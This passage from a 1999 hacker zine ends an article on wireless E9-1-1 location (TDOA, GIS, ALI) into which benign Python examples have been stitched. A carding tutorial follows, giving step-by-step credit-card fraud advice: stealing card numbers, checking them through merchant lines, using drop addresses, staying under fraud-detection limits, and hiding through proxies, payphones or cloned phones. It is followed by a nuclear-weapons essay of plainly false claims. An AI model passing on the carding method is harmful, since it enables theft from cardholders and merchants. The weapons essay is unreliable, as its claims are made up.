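        return key

    def release(self, key):
        """Free the key once the PSAP has finished with the call."""
        self.ali.records.pop(key, None)


def handle_wireless_911(iam, esa):
    """Stage 1 flow for a CAMA PSAP: route, stage the ALI record, deliver the key.

    Returns the chosen PSAP, the key sent in the ANI field, and the record the
    PSAP CPE gets back when it queries the ALI with that key.
    """
    psap = select_psap(iam)
    ani_key = esa.stage_call(iam)
    return psap, ani_key, esa.ali.query(ani_key)


if __name__ == "__main__":
    esa = EmergencyServicesAdjunct(AliDatabase())
    call = IsupIam(charge_number="2125550123", called_party_number="5555550102")
    print(handle_wireless_911(call, esa))
```

The point to take from the flow is that the CAMA PSAP sees only the key; the
dial-back number and cell location exist solely in the ALI record, which is
why the key must be unique per live call and released afterwards.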
Stage 2:
Stage 2 is basically just an architectural build on what was created in Stage
1. The implementation was to last near 5 years. Stage 2 brings new GIS
capabilities that work better with the wireless E9-1-1 system. During this
stage the geolocation system is required to meet the FCC's 5 year requirements
for wireless E9-1-1, so the wireless system has to communicate with the
geolocation system to determine the position of a target mobile terminal (the
one that has dialed 9-1-1). Alternatively, if the wireless system recognizes a
mobile telephone equipped with GPS, the mobile terminal can provide its
current location via new air interface messages.

Several technologies have been proposed to meet the FCC's long term mobile
locating requirements for wireless E9-1-1 systems. To meet the needs of the
9-1-1 community, that is those who provide the emergency response service to
the public, the existing base of mobile phones must be supported without
modification. Promising technologies proposed for this purpose include time
difference of arrival (TDOA) and direction of arrival (DOA) triangulation
systems. Each has its advantages depending on the physical environment in
which it is deployed. In addition, advances in GPS receiver technology have
made it possible to integrate GPS with wireless telephones, which has recently
started to reach the commercial market. If the mobile terminal knows its
location, it makes sense to use this information for the E9-1-1 system,
because GPS is potentially much more accurate than a location determined by
TDOA or DOA triangulation.

The geolocation information (latitude, longitude, altitude, and accuracy) is
carried in the SS7/ISDN-UP and ISDN call set-up messages for the 9-1-1 call.
At this point in the evolution, the SS7/ISDN-UP and Transaction Capabilities
Application Part (TCAP) signaling protocols are modified to support
transmission of the location information from the wireless system to the
selective router. ISDN-UP is used to deliver location information with call
set-up, while TCAP messages are used to support caller location tracking,
which requires location updates during a call. Regardless of the location
technology used by a wireless service provider, the location information is
passed through the network and used in a standard way, so the E9-1-1 network
infrastructure stays the same whatever location technology the wireless
network uses. Although not required by the FCC rule making, the new location
information can be used to route a call to the right PSAP accurately.
Upgrades to support this include geolocation routing capabilities integrated
into the 5ESS-2000 switch's E9-1-1 feature, the ESA, and the DBMS. Once again
the information is delivered to the PSAP, and computer aided dispatch systems
with GIS mapping are used to portray it in a way that is easily understood by
the telecommunicator and the responding emergency personnel. The improved
location information is reflected in the GIS map display as a pinpointed
location with an associated accuracy representation. A GIS based service
administration capability provides the ability to define and dynamically
change municipal jurisdictional boundaries and emergency service zones via a
computerized map interface. This administration system indirectly maintains
the call routing data used by the 9-1-1 selective router. The process
simplifies the administration of the 9-1-1 service by eliminating the need to
share cell/sector location data among wireless, local exchange, and emergency
service providers. In this environment, base station reconfigurations by a
wireless service provider no longer affect the data maintained in the PSTN and
the PSAP providing the end-to-end E9-1-1 service.

Onward to my brief explanation of triangulation and geolocation. Network
based triangulation methods of location (TDOA and DOA) require that at least
two DOA or three TDOA receivers hear the target mobile terminal, and that some
technique be available to resolve the ambiguities caused by multipath
propagation. These requirements may be difficult to meet in many wireless
environments, degrading the accuracy of the locating system or making
deployment cost prohibitive. For example, in rural environments cell sites
cover very large geographical areas, often resulting in marginal voice
coverage on the fringes of the cells. In such areas it is unlikely that
receivers in multiple cell sites would "see" the mobile terminal, making it
difficult or impossible to establish the caller's location. This could be
worked around by adding supplementary location receivers, although such a
deployment might be very costly for rural wireless service providers. In
dense urban areas, on the other hand, multipath propagation becomes the
dominant factor in the deterioration of the locating system's accuracy.
Multipath propagation means that multiple copies of the same transmitted
signal are received by an antenna. Usually the first signal arrives via the
most direct path from the transmitter; additional copies are received later,
from hundreds of nanoseconds to tens of microseconds later, and overlap the
first signal. These copies result from reflection of the original signal off
objects such as buildings and vehicles. Since a TDOA system measures arrival
times, a reflected copy that is mistaken for the direct path adds its extra
path length straight into the range difference (about 300 m for every
microsecond of delay). The effects of multipath, particularly in cities, can
degrade the precision of the location estimate to the point where there is no
added benefit over simply reporting the serving cell/sector, because urban
environments often have relatively dense micro cell grids anyway. These
problems are difficult to overcome without some assistance from the mobile
telephone. Whether or not the FCC requirement of 125 m accuracy will be
technically or economically feasible in such environments is not clear.
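The TDOA method and the multipath problem above, as an added worked example
(not from the article): a Gauss-Newton solver for the hyperbolic
range-difference equations from three or more sites, run against a constructed
4 km site layout and a constructed 1 microsecond late arrival at one site. The
function names, site coordinates and mobile position are assumptions made for
the example; the speed of light is the only real constant in it.

```python
"""2-D TDOA geolocation with a multipath bias demonstration.

Added example; sites, mobile position and the multipath delay are constructed.
"""
import math

C_LIGHT = 299_792_458.0  # metres per second


def _dist(p, q):
    return math.hypot(p[0] - q[0], p[1] - q[1])


def tdoa_measurements(receivers, mobile, extra_path=None):
    """Simulate what the location receivers report: time difference of arrival
    at each receiver relative to receivers[0], in seconds.

    `extra_path` maps a receiver index to extra path length in metres and stands
    in for a reflected (multipath) copy being taken for the direct signal there.
    """
    extra = extra_path or {}
    ranges = [_dist(r, mobile) + extra.get(i, 0.0) for i, r in enumerate(receivers)]
    return [(ranges[i] - ranges[0]) / C_LIGHT for i in range(1, len(ranges))]


def locate_tdoa(receivers, tdoas, guess=None, iterations=50, tol=1e-6):
    """Solve the hyperbolic TDOA equations for (x, y) by Gauss-Newton.

    Two unknowns need at least two independent TDOAs, hence at least three
    receivers; with more receivers the normal equations give a least-squares fit.
    """
    n = len(receivers)
    if n < 3:
        raise ValueError("TDOA needs at least three receivers to hear the mobile")
    if len(tdoas) != n - 1:
        raise ValueError("expected one TDOA per receiver after the reference")
    if guess is None:  # start from the centroid of the sites
        guess = (sum(r[0] for r in receivers) / n, sum(r[1] for r in receivers) / n)
    x, y = guess
    for _ in range(iterations):
        d = [_dist((x, y), r) for r in receivers]
        if min(d) == 0.0:
            break  # sitting on a receiver; the unit vector is undefined
        a = b = c = 0.0  # entries of J^T J
        g0 = g1 = 0.0    # entries of J^T r
        for i in range(1, n):
            res = (d[i] - d[0]) - C_LIGHT * tdoas[i - 1]  # range-difference residual
            jx = (x - receivers[i][0]) / d[i] - (x - receivers[0][0]) / d[0]
            jy = (y - receivers[i][1]) / d[i] - (y - receivers[0][1]) / d[0]
            a += jx * jx
            b += jx * jy
            c += jy * jy
            g0 += jx * res
            g1 += jy * res
        det = a * c - b * b
        if abs(det) < 1e-12:
            raise ValueError("degenerate receiver geometry, position is ambiguous")
        dx = -(c * g0 - b * g1) / det  # 2x2 solve of (J^T J) step = -J^T r
        dy = -(a * g1 - b * g0) / det
        x += dx
        y += dy
        if math.hypot(dx, dy) < tol:
            break
    return (x, y)


def position_error(receivers, mobile, extra_path=None):
    """Metres between the true mobile position and the TDOA estimate."""
    est = locate_tdoa(receivers, tdoa_measurements(receivers, mobile, extra_path))
    return _dist(est, mobile)


# Three sites on a 4 km grid and a mobile inside the triangle (constructed).
SITES = [(0.0, 0.0), (4000.0, 0.0), (0.0, 4000.0)]
MOBILE = (1000.0, 1500.0)

if __name__ == "__main__":
    print("clean fix error (m):", position_error(SITES, MOBILE))
    print("1 us multipath at site 2 (m):",
          position_error(SITES, MOBILE, {2: 1e-6 * C_LIGHT}))
```

With clean measurements the solver recovers the mobile to well under a metre.
A single 1 microsecond late arrival at one site (about 300 m of extra path)
moves the fix by more than the FCC's 125 m, which is the article's point about
urban multipath: the solver has no way to tell a reflected copy from the
direct path without help from the handset or extra receivers.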
VI. Long Term & Conclusion
Although the recent FCC ruling only requires location accuracy of 125 m in
67% of all cases, the public safety community often requires even more
accurate information. Ideally an emergency unit responding to a 9-1-1 call
would know exactly in which room of a skyscraper the incident is occurring or
has occurred (using, for instance, the ISDN-UP altitude parameter). Clearly
this level of accuracy cannot be achieved cost effectively with unmodified
wireless phones and today's technology. With new technology and assistance
from the mobile terminal, however, future land based location systems will be
able to provide much better accuracy than the FCC Stage 2 requirements.
Although such systems are not available today, several concepts have been
proposed, for example signpost location beacons and specialized signaling
schemes optimized for location purposes. Whatever scheme becomes dominant as
the technology matures, the pursuit of standard implementations is important.
This will ensure that the costs associated with an improved wireless E9-1-1
system are reduced. Basically, from a safety standpoint all this is really
fine in my opinion. It will help save other people and possibly yourself one
day. Meanwhile this isn't really a cell user's friend. It gives the wireless
service providers more control over you, which can be looked at as a very bad
thing. Anyway, peace.
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Carding ]::::::::[OO--[ by kryptus ]------------------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Hello boys and girls, welcome and listen up, as I am about to put some data
in that little brain of yours. Well let me tell you, carding has changed so
much since I first started, but now I have quit and have moved on to other
things and would like to pass my knowledge down to you young'ns. Well, to
start off, when trying to find a CC never go dumpster diving, it's nothing but
a thing of the past. It can be done but is very hard to do. The best way is to
shoulder surf or to work at a job where they use credit cards, such as a store
in the mall. The way to find out how much is left or if it works is to use a
merchant #; these are used by sales people to validate that a CC works
correctly. There are two ways to do this: find a port site or phone # and
enter in the CC info, and if it works you might have yourself a CC, but a much
better way is either an online or phone merchant, which gives you details on
the limit and how much is left to spend. Next you need to find yourself a nice
place to card this stuff to, and no matter what never ever ever ever card to
your own house. Find an abandoned apartment or house and leave a note on the
door if you know the delivery date, or just leave it on there with a message
saying "I am currently moving in, please just leave my package in front of my
door or behind some bushes", and then you need to make sure no one is watching
you. Make sure this drop area is far away and not next door, because when the
police come by they first ask the neighbors, that's you, questions and
investigate. Also nowadays a computer monitors CC use, so if someone usually
orders 50-200 dollar stuff each time they use it and then a 500 dollar charge
appears, the card is frozen and they call the owner of the card on the number
given, no matter what number is given to the clerk, and it is verified to make
sure it is not fraud, so I suggest only buying small things under 200 dollars;
that way you actually can get what you want, so don't try and order a laptop,
trust me it won't go through. What you should buy is either clothes, CDs, RAM,
a modem, or anything that doesn't say expensive when you think about it. Now,
to try and not get caught. Well, either use a proxy server when you do this so
your IP won't be on their server, because each time you order they keep your
IP for reference to find out who made the order. Also if you are on dial up
they can easily find you if you don't use a proxy: notice when you log in,
notice the word LOG, yes they log what phone # used this IP at what time, so
your ISP could easily find out who it was. Or if you call, which is much
better and safer, call from a payphone or a cloned cell phone and never your
home phone, because the companies use ANI and generally *67 won't, but maybe
an op divert will, but I strongly suggest the first two methods listed. Be
careful and don't get caught.
This has been brought to you by Kryptus
kryptus@deep-house.com
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Political views ]::::::::[OO--[ by nino ]-------------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.-. .-.
.--' / \ '--.
'--. \ _______ / .--'
\ \ .-" "-. / /
\ \ / nino \ / /
\ / \ / [ Poloticol Views ]
\| .--. .--. |/ [ Volume One ]
| )/ | | \( | [ nino ]
|/ \__/ \__/ \| []
/ /^\ \
\__ '=' __/
|\ /|
|\'"VUUUV"'/|
\ `"""""""` / [ Greets : Darkcyde ]
`-._____.-' [ hybrid ]
/ / \ \ [ darkcyde.8m.com ]
/ / \ \
/ / \ \
,-' ( ) `-,
`-'._) (_.'-`
--------------------------------------------------------------------
Political views: .'`Nuclear Warheads`'.
Many of us know about the United States Army, and how they work.
But allow me to explain in detail some of the problems the U.S. faces
by withholding a nuclear warhead. The major problem is that there are
other countries trying to make warheads to be able to compete in the
United States' strategic warfare, minor authority in communications
and prospects. These countries such as Kuwait, Kosovo, and many others
feel like they are being controlled by the U.S. military and the army.
But what is it they really fear? Is it our population count for our
armed services? Is it our communications\technology power? Or is it
the nuclear bombs? Yes indeed, it is. The United States has 7 nuclear
warheads known to the public that are stationed in multiple spots around
the country. There is just one problem: what about the other 11 secret
warheads that the U.S. has? Yes indeed, the United States government
has a total of 18 nuclear warheads ready for use. That is a lot of power.
The only problem is, they are more chemical than anything. They use
a substance known as petroleum and mix it with quantum levels of cells
and chemicals that are more deadly than the bomb itself. Remember
hearing about the 'Black Plague' in or at school? Well, there is a
certain amount of volume\mass mixtures that create a deadly killer
cell that we breathe. This cell attacks the immune system and creates
visionary problems as well as breathing. Sooner or later u will die.
There is no cure. There is a lot more to it than just that, but allow me
to tell you about the major problem that I 'view' in my own mind.
The United States government has 18 nuclear warheads ready for use
in case of a national emergency. But think of it this way: other
countries have these chemical weapons too, such as Russia\UK. This
creates a problem now. If we ever have a nuclear war, and we bomb
a country with nuclear weapons who in return does the same to us, our
planet (Earth) 'could' be knocked off its axis. Ever think of that?
Or it could cause a meltdown, or a series of storms that will certainly
take most of us out. But another problem is a nuclear bomb has more
power than that comet that wiped out the dinosaurs. We could not
possibly survive a nuclear war with another country. It is utterly
impossible. And don't say 'I have a bomb shelter and food rations'
because what happens when u run out of water\food? U will have nothing.
Or what happens if the earth is knocked off its axis? A bomb shelter
won't protect u from being killed by gravity. Hell, nuclear bombs react
to metallic and electrical machinery, almost like a 500 st magnet.
Ur watches will stop, radios will be fried, cars will be ripped apart
by radiation, gold teeth will be forcefully pulled from one's mouth,
and ur bomb shelter could have a 99% chance of being torn out of the
ground and torn to pieces, depending on ur location. The nuclear
warheads that Russia possesses can destroy a lot of things. Say for
instance they dropped the bomb on our state's capitol. Half the states
around it would be utterly destroyed, not to mention the others that are
left will suffer from radiation cancer, poisoning and also no light.
If it shifts the gravitational pull u will be ripped apart not only
from the lack of air to breathe but because the radiation opens the
pores of your skin and eats away at your protective white cells. There
isn't much we can do about this right now. But maybe, just maybe, some of
you who are leaders will try as hard as they can to speak to the public
and rage protests against nuclear warheads, and maybe even war.
---------------------------------------- nino ----------------------
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Outness ]::::::::[OO--[ by hybrid ]-------------------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
HEH, that's it for this issue of f41th dudes. We really need some feedback on
our zine so if theres anyone out there that wants to give us a slagging or
anything, email hybrid@phunc.com. You can get f41th from www.darkcyde.8m.com
www.darkcyde.system7.org or from my site www.phunc.com/~hybrid. Shouts to
everyone in #darkcyde EFNET, werd, also #9x + #b4b0. Hope you enjoyed f41th
issue 5, keep reading.. peace. O y34H, alm0st fOrgOt b1tch3z, dOn't fOrg3t
tO t4k3 j00r k4fF3n p1llz.. h4x0r1ng l1f3 jUsT wOulDn`T b3 d4 s4m3 w1thOut
`3m.. *WERD*
[c] D4RKCYDE 1999 (darkcyde.8m.com | darkcyde.system7.org)
#darkcyde EFNET